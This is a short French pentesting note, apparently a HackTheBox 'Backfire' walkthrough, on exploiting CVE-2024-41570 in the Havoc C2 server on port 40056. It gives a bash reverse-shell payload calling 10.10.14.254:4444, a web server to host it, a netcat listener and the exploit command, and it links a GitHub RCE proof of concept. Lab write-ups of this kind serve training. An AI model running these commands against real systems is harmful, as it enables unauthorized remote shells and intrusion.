Port 40056 Pentesting Havoc-C2

Havoc-C2 est un outil de commande et contrôle (C2) open-source conçu pour les tests d'intrusion et les simulations d'attaques. Il permet aux professionnels de la cybersécurité de gérer des agents malveillants implantés sur des systèmes compromis, de planifier des attaques, et d'exfiltrer des données, dans un environnement contrôlé, pour évaluer la sécurité des infrastructures informatiques.

GitHub - thisisveryfunny/CVE-2024-41570-Havoc-C2-RCE: This is a Chained RCE in the Havoc C2 framework using github.com/chebuya and github.com/IncludeSecurity pocsGitHub

Pour exploiter la vulnérabilité SSRF dans Havoc, nous créons un fichier payload.sh contenant le code suivant :

#!/bin/bash
 
bash -i >& /dev/tcp/10.10.14.254/4444 0>&1

Ensuite, nous mettons en place un serveur web pour héberger notre payload avec la commande suivante :

python3 -m http.server 80

Nous écoutons ensuite sur le port 4444 avec netcat pour recevoir la connexion inversée :

nc -nlvp 4444

Nous modifions le script pour y inclure les informations pertinentes, puis exécutons l'exploitation via la commande suivante :

python3 exploit.py -t https://backfire.htb -i 127.0.0.1 -p 40056

Accès utilisateur :

L'utilisateur ilya permet de se connecter à la machine cible.

Mis à jour il y a 1 an